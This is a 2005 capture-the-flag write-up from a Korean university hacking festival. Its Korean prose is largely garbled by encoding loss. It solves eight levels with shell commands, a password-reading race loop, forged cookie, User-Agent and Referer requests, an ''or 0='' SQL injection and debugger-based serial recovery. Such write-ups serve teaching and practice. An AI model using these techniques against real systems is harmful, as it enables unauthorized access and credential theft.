==========================
/ SoonChunhyang Univ.    /
/ Hacking Festival       /
/               (report) /
==========================

[hkpco@ns hkpco]# whoami
id        / hkpco
mail&msn  / hkpco@korea.com
homepage  / http://hkpco.kr/
name      / 
school    / б



| Contents |
----------------------------------------------------------------
  1.  level1	- Computer Knowledge Test                      |
  2.  level2	- Finding Directory and Similar Race Condition |
  3.  level3	- Equation problem and Interrupt               |
  4.  level4	- Reverse Engineering -1                       |
  5.  level5	- Guessing Account and Using a Method          |
  6.  level6	- Checksum calculation                         |
  7.  level7	- Sql Injection                                |
  8.  level8	- Reverse Engineering -2                       |
----------------------------------------------------------------



!!!!!!!!!!!!!!!!!! level1 - Computer Knowledge Test !!!!!!!!!!!!!!!!!!

/*
	18 ̻  н尡 ־ ϴ.
*/

level1  µ 20  18 ̻ ߸ ٸ     ֽϴ.
  ˻ ̿Ͻø  Ǯ  ֽϴ.

׸ ٸ , 18 ̻  ϸ "ƲȽϴ."    ִµ
ű⼭ ڷΰ ư  츮 Ǯ   ״ ֽϴ.
׷ Ʋ  Ͽ ٽ Ǯ   Ǯ  ֽϴ.

{ 18 ̻    }
18  ߾ ϴ. level1 password is : no surprise





!!!!!!!!!!!!!!!!!! level2 - Finding Directory and Similar Race Condition !!!!!!!!!!!!!!!!!!

/*
	59.27.205.110 id: level2
*/

 ̵ ־ϴ.
ó ssh brute_force ˰ õϷ Ͽµ ˰ level1 Դ  level2 н忴ϴ.

    ls -al    3 ̸ 丮 ǽɽϴ.

ssh login: level2
Password:
Last login: Mon Nov 28 21:10:17 2005 from 61.99.161.93
[level2@stage1 ~]$ ls -al
 44
drwxr-xr-x  3 root    root    4096 11?
drwxr-xr-x  2 root    root    4096 11?
drwxr-x---  5 root    level2  4096 11?
drwxr-xr-x  5 root    root    4096 11?.
lrwxrwxrwx  1 root    root       9 11?bash_history -> /dev/null
-rw-r--r--  1 level2  level2    24 11?bash_logout
-rw-r--r--  1 level2  level2   191 11?bash_profile
-rw-r--r--  1 level2  level2   124 11?bashrc
-rwxr-xr-x  1 marilyn marilyn 1167 11?viminfo

Ű ̿Ͽ  ڼ ̸ ҽϴ.


[level2@stage1 ~]$ ls [tab][tab]
^B/            .bash_history  .bash_profile  .viminfo       Hint
^V/            .bash_logout   .bashrc        ?/

^B , ^V , ^?  ϳ    Դϴ.


丮  Ȯϱ Ͽ hexdump Ǵ xxd ش  16 ڵ带   ֽϴ.

[level2@stage1 ~]$ ls|xxd
0000000: 020a 160a 3f0a 4869 6e74 0a              ....?.Hint.


캻  ^B password ִٴ  ȮϿϴ.
, password level2    ϴ.

[level2@stage1 ~]$ cd `printf "\x02"`
[level2@stage1 ]$ ls
chamber of secret
[level2@stage1 ]$ cd chamber\ of\ secret\ \ \ \ \ \ \ \ \ \ \ \ \ \ /
[level2@stage1 chamber of secret              ]$ ls
password  tmp
[level2@stage1 chamber of secret              ]$ ls -l password
-r--r-----  1 root root 42 11?assword


 ̴ , password other ѹ read ۹̼ ־ٴ° ȮϿϴ.

[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r-----  1 root root 42 11?assword
[level2@stage1 chamber of secret              ]$ ls -al password
-r--r--r--  1 root root 42 11?assword

       other read ־!.


 password loop  е ڵϸ  ðԴϴ.
 C ڵϿϴ.

- read_loop.c -

#include <stdio.h>
#include <unistd.h>

int main( void )
{
	while(1)
	{
		system( "cat /home/level2/\`printf \"\x02\"\`/cha\*/password" );
	}
}

[level2@stage1 tmp]$ cat > read_loop.c
#include <stdio.h>
#include <unistd.h>

int main( void )
{
        while(1)
        {
                system( "cat /home/level2/\`printf \"\x02\"\`/cha\*/password" );
        }
}
[level2@stage1 tmp]$ gcc -o read_loop read_loop.c
[level2@stage1 tmp]$ ./read_loop 2>/dev/null
good job :)

password is "info security"





!!!!!!!!!!!!!!!!!! level3 - Equation problem and Interrupt !!!!!!!!!!!!!!!!!!

/*
	59.27.205.110 id: level3

	[level3@stage1 ~]$ cat Hint

	x*x*x*x - 34*x*x*x - 340*x*x + 1858*x + 12915

	        a < b < c < d
*/

level3   level2 ȹ н ϸ ˴ϴ.
 Ͽ Hint   Ͱ 4 µ,
 Ǫ    Ǯų, Ʋ(Matlab) ̶ α׷ ̿ϸ ս    ֽϴ.

׷ؼ   Ʒ ϴ.

        a < b < c < d

       -9 < -5 < 7 < 41

,  level3   Ѿ մϴ.
level3  α׷ ϴ  1ʰ OOps d = 1 , OOps d = 2 , OOps d = 3 ........
̷ µǰ ־ϴ.
  Ϸ ctrl+c , ctrl+x  ͸Ʈ   Ʒ ,
 ش ͸Ʈ ٰ   Ȥ  Ǿϴ.

 OOps a = -1 , OOps c = 1 , OOps d = 12 ................

׷   ,
level3 α׷   ͸Ʈ  츮 ߴ ٵ  Ͽ ҽϴ.

 ٵ Ʒ  ͸Ʈ  Ǿ ϴ.

==========================
a = Ctrl + C
b = Ctrl + \
c = Ctrl + Z
d = 1sec +1 
==========================

Ͱ  a,b,c,d  ϸ( , d 41 Ǳ  a,b,c   ־ մϴ. )
 Ŀ н尡 ߰Ե˴ϴ.

OOps d = 38
OOps d = 39
OOps d = 40
OOps d = 41

rage against the cracker

OOps d = 42
OOps d = 43
OOps d = 44
OOps d = 45
OOps d = 46
OOps d = 47





!!!!!!!!!!!!!!!!!! level4 - Reverse Engineering -1 !!!!!!!!!!!!!!!!!!

/*
	http://59.27.205.110/level4/tksgkr/quest4.exe
*/

Ͼ Դϴ.
̹  ణ ٸ ð ѱ ϴ. ^^

ó  Ϸ  ʰ  ִ  ip, ȸ ip range    
hkscan x.x.x.0 ~ x.x.x.255 , y.y.y.0 ~ y.y.y.255   80Ʈ   ãƼ
 .index.bak û ҽϴ.
, û ߸Ǿ ᱹ   , Ǹ ã γ ˾Ƴ Ǿϴ.

켱, level4.exe   ollydbg  openմϴ.
õõ 캸 Է ip 80Ʈ ƷͰ û ־ϴ.

GET .index.bak HTTP/1.0
User-Agent: HTTPTEST

Ƹ Ư  ּҸ ã    ˾      Ͽϴ.
[Search for] -> [All referenced text strings]    װ  ǽɽϴ.

1) ASCII "0592842722"
2) ASCII "2027148262"
3) ASCII "2320512323"
4) ASCII "2221114222"

Ƹ  װ  ip   ִ õ Ǵ° ҽϴ.
1)  break ɰ run Ͽ ƹ ̳   F8 ̿Ͽ ϳϳ 찬ϴ.
  loop  4 ȯϴµ ip  ־ϴ!..

F8 ̿Ͽ 4  ȯŰ  츮 ϰߴ ip ٷ  ipϴ!..
..  ip_range scanϿ û   ¾ ̷ ð   ݰԲ ϴ.

telnet ̿Ͽ 80Ʈ   .index.bak ûϸ   ˴ϴ.

[hkpco@ns sch]$ telnet 59.027.205.111 80
Trying 59.27.205.111...
Connected to 59.027.205.111.
Escape character is '^]'.
GET /.index.bak HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 27 Nov 2005 16:43:29 GMT
Server: Apache/2.0.52 (Fedora)
Last-Modified: Sat, 26 Nov 2005 00:17:50 GMT
ETag: "a81d0-3a-ccdb4780"
Accept-Ranges: bytes
Content-Length: 58
Connection: close
Content-Type: text/plain; charset=UTF-8

ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk=

Connection closed by foreign host.


н ISEhTGV2ZWw0ICEhIQ0KUGFzc3dvcmQgOiBrbm93IHlvdXIgZW5lbXk=  base64 encodingȰ Ǯ,

!!!Level4 !!! Password : know your enemy   ϴ.





!!!!!!!!!!!!!!!!!! level5 - Guessing Account and Using a Method !!!!!!!!!!!!!!!!!!

/*
	http://59.27.205.110/level5/guqehdrhks/level5.html

	α :
	id :
	pass : 

	level5 ȼ پ "SecurityFirst Explorer"  Ͽ ϰ 

	192.168.111.222/level5.html   Ͽ Ѵ.

	guest page   |  level5 page

*/

̹  idpass Ͽ  μ  level5 Ͽ մϴ.
Ƹ guest page  Ǿִ°  ̵ guestΰ ϴ.( ߿ Ʈ guest Ա.. ^^ )
pass a ϴ 4ڿϴ.
  pass asdf° ϰ   ־ϴ.

α ϸ `guest  α Ǿϴ`  ޽  , refresh ٽ  ̵ϰ ˴ϴ.
javascript:document.cookie ̿Ͽ Ű Ȯ ҽϴ.

user=guest   °  Ƹ level5 Ű user=level5 ϸ ɰԴϴ.
, SecurityFirst Explorer̶  ؾѴٰ Ǿִµ,
  User-Agent ֱ , 츮 User-Agent  SecurityFirst Explorer  ָ
  üũ    ֽϴ.
   û  ҽϴ.

[hkpco@ns hkpco]$ telnet 59.27.205.110 80                                       Trying 59.27.205.110...
Connected to 59.27.205.110.
Escape character is '^]'.
GET http://59.27.205.110/level5/guqehdrhks/level5.php HTTP/1.0
User-Agent: SecurityFirst Explorer
Cookie: user=level5;

HTTP/1.1 200 OK
Date: Mon, 28 Nov 2005 12:00:55 GMT
Server: Apache/2.0.53 (Fedora)
X-Powered-By: PHP/4.3.11
Content-Length: 134
Connection: close
Content-Type: text/html; charset=EUC-KR
Content-Language: kr

<script>alert('192.168.111.222/level5.html   Ͽ Ѵ');</script>
<meta http-equiv= refresh content=1;url=level5.html>

Connection closed by foreign host.


192.168.111.222/level5.html Ͽ Ѵٸ  ˷ ʽϴ.
ó ʹ    192.168.111.222/level5.html  Ͽ ϴ  ˰ ޿ϴ.
ٽú 192.168.111.222/level5.html ϴ ̿ Referer method ̿Ͽϴ.
Referer   ϱ ٷ   Ÿ ݴϴ.

ٽ ѹ Referer ߰ û  ڽϴ.

[hkpco@ns sch]$ telnet 59.27.205.112 80
Trying 59.27.205.112...
Connected to 59.27.205.112.
Escape character is '^]'.
GET http://59.27.205.112/level5/guqehdrhks/level5.php HTTP/1.0
User-Agent: SecurityFirst Explorer
Referer: 192.168.111.222/level5.html
Cookie: user=level5;

HTTP/1.1 200 OK
Date: Sun, 27 Nov 2005 20:30:00 GMT
Server: Apache/2.0.52 (Fedora)
X-Powered-By: PHP/4.3.9
Content-Length: 81
Connection: close
Content-Type: text/html; charset=EUC-KR

 <br> level5  ȳϼ. <br>  level5  н plastic tree Դϴ.<br>

Connection closed by foreign host.

level5 н带 ȹϿϴ!.





!!!!!!!!!!!!!!!!!! level6 - Checksum calculation !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level6/WkWk/level6.html

		IPv4 header (1) 
	-------------------------------- 
	45  00  00  40  F5  DA  40  00  80  06  
	        C0  A8  00  02  42  A1  27  C3  

		IPv4 header (2) 
	-------------------------------- 
	45  00  00  3E  24  BD  00  00  80  11  
	        3B  1B  CD  78  A8  7E  3F  01  
*/

 2ĭ  4ĭ  ִµ, Ŷ ĸ   ĭ Checksumΰ    ֽϴ.
 м  Ʒ   ˴ϴ.

(45  00)ip_version
(00  40)total_length
(F5  DA)id
(40  00)flags
(80)time_to_live: 128
(06)protocol -TCP
(      )check_sum
(C0  A8  00  02)source_ip: 192.168.0.2
(42  A1  27  C3)des_ip   : 66.161.39.195
  


(45  00)ip_version
(00  3E)total_length
(24  BD)id
(00  00)flags
(80)time_to_live
(11)protocol
(      )check_sum
(3B  1B  CD  78)source_ip: 59.27.205.120
(A8  7E  3F  01)des_ip   : 168.126.63.1

  raw Ҷ ̴ checksumԼ ̿Ͽ Ҽ ְ,    ϴ  ֽϴ.
⼭ ϴ  IPv4 header (1)  checksum غڽϴ.

{checksum }
================================================================
1. 16Ʈ    Ѵ.
2.  16Ʈ  16Ʈ  ؼ 16Ʈ .
3. 1   üũ ȴ.
================================================================



4500+0040+F5DA+4000+8006+C0A8+0002+42A1+27C3 = 3262E ( 16Ʈ   մϴ )

3262E = 262E , 0003 / 262E + 0003 = 2631 (  16Ʈ Ƿ 16Ʈ ؼ 16Ʈ ϴ )

0010 0110 0011 0001 -> 1101 1001 1100 1110 ( 2 ٲ  1  մϴ )

11011001 11001110 -> D9 DE ( D9 DE IPv4 header(1) checksum ˴ϴ )

̷  IPv4 header(2) ؼ ־ ...

password is "packet storm"





!!!!!!!!!!!!!!!!!! level7 - Sql Injection !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level7/dkdfl/level7.html

	     :
	     :
	Ϲȣ :

	[ Ȯϱ ]
*/

е   Ǭ Ӹ ϴ ΰ ϴ. :-)

̸ , Ϲȣ      Ȯϱ ư  츮 Էߴ  ɴϴ.
javascript:document.cookie ̿Ͽ Ű ԵǸ Ϲȣ ԷϿ  Ű ˴ϴ.
׷  κ ȸϵ  sql ϸ  ϰԵǾ, ڿ  
 Ӹ ƴ϶ ٸ Է 鵵    ְ ˴ϴ.
Ϲȣ 'or 0=' Ͱ sql ȸϴ   Ͽ Ȯϱ⸦ Ŭ 
  Է  Ȯ   ִµ ãƺ,   н尡 ֽϴ.

***********************************************

your information :

  : password is :
  : comeasyouare
Ϲȣ : 2002338720034713

***********************************************

password is comeasyouare ^^





!!!!!!!!!!!!!!!!!! level8 - Reverse Engineering -2 !!!!!!!!!!!!!!!!!! 

/*
	http://59.27.205.110/level8/chlrhdi/level8.exe
*/

   Ͽϴ.
level8 ó level4ó Ͼ Ǫ Դϴ.
α׷ Ѻ ʿ 16 ڵ尡 ֱ淡  α׷ ̿Ͽ ڷ ȯ ҽϴ.

[hkpco@ns public_html]$ cat hk.c
/*
        made by hkpco
        mail&msn : hkpco@korea.com
        homepage : http://hkpco.kr/
*/

#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main( int argc , char **argv )
{
        int i=0;
        int s=0;

        char *ch[256] = { 0x00, };

        if( argc < 3 )
        {
                fprintf( stderr , "fuck\n" );
                return -1;
        }

        do
        {
                if( i== 0 )
                ch[i] = strtok( argv[1] , argv[2] );

                sscanf( ch[i] , "%x" , &s );
                printf( "%c" , s );

                i++;

        } while( ch[i] = strtok( NULL , argv[2] ) );

        printf( "\n" );
        return 0;

}
[hkpco@ns public_html]$ ./hk "3B 10 40 00 00 00 00 00 6F 75 20 61 47 6F 6F 64 20 49 73 20 72 79 20 79 20 00 00 00
                              72 65 20 77 00 00 00 00 18 22 40 00 00 00 00 00 88 FE 12 00 98 0A 00 00" " "
;@ou aGood Is ry y re w"@?

ݺ Ǯ̿ʹ   ° ҽϴ.

   ڽϴ.
ollydbg ̿Ͽ level8.exe openմϴ.
[Search for] -> [All referenced text strings] ̿Ͽ  ڿ ãϴ.

ASCII " Sorry You are wrong "
ASCII "Good Job! Serial Is Right!"
ASCII " Sorry You are wrong "
ASCII " Sorry You are wrong "
ASCII "sch_sf.exe"
̺κе Ǯ̿  ִ°ó Դϴ.

ASCII " Sorry You are wrong "
ASCII "Good Job! Serial Is Right!"
ASCII " Sorry You are wrong "
ASCII " Sorry You are wrong "
⿡ break ɰ α׷   ڿ  Է  մϴ.
׷ 츮 break ɾ κ ̵ϰ ˴ϴ.

00401749  |. 68 44404000    PUSH level8.00404044                     ;  ASCII " Sorry You are wrong "
̺κп ݸ  ԵǸ

0040170C  /$ 55             PUSH EBP
̷ α׷ κ ƾ ϴ κ ְԵ˴ϴ.
Ʒ ڽ  Local call from 004016E6̶ ִµ ̰ call κ ̵ϱ Ͽ
[Go to] -> [Call from 004016E6]  մϴ.

׷ ٷ   ǵ,  󰡼 Ʒ   ƾ ۺκ  ̵մϴ.
0040142B  /. 55             PUSH EBP

⼭ ̵  ȣȭϿ ϰ ϴ  ϰ ˴ϴ.
 󰡸鼭   , ؾ   ϳ sch_sf.exe̾
 ϳ    ֽϴ.

Ʒ ô κ ٷ 츮 Է  ø ȣ ϴ Դϴ.

004016BB  |. 3B42 60        CMP EAX,DWORD PTR DS:[EDX+60]

̷  ̰ break ɰ ٽ α׷   ڿ  Էմϴ.
׷ 츮 break  ̵ϰ Ǵµ Ʒ ڽ ø 
EAX   츮 ϴ ø ȣԴϴ.
   Input Name  ϴµ,  κ Խǿ   ø   ֽϴ.

->
Name - securityfirst    ϵ, ̳ʸ ġϰų   ƾ  Ұ, ִ ״ Ǯ մϴ.
<-

Input Name securityfirst Ǿ մϴ.
׷ ٽ ø 񱳱 break ɰ Input Name securityfirst Է  ȮϽø CMP break ɸ ǰ
 Ʒ ڽ ø, EAX ø ȣ ˴ϴ.

Stack DS:[0012FEE4]=423A35C7
EAX=1AE55C30

EAX  1AE55C30 10 ٲٸ  츮 ϴ   źϰԵ˴ϴ.

1AE55C30 -> 451238960

׸......

Level Clear...!
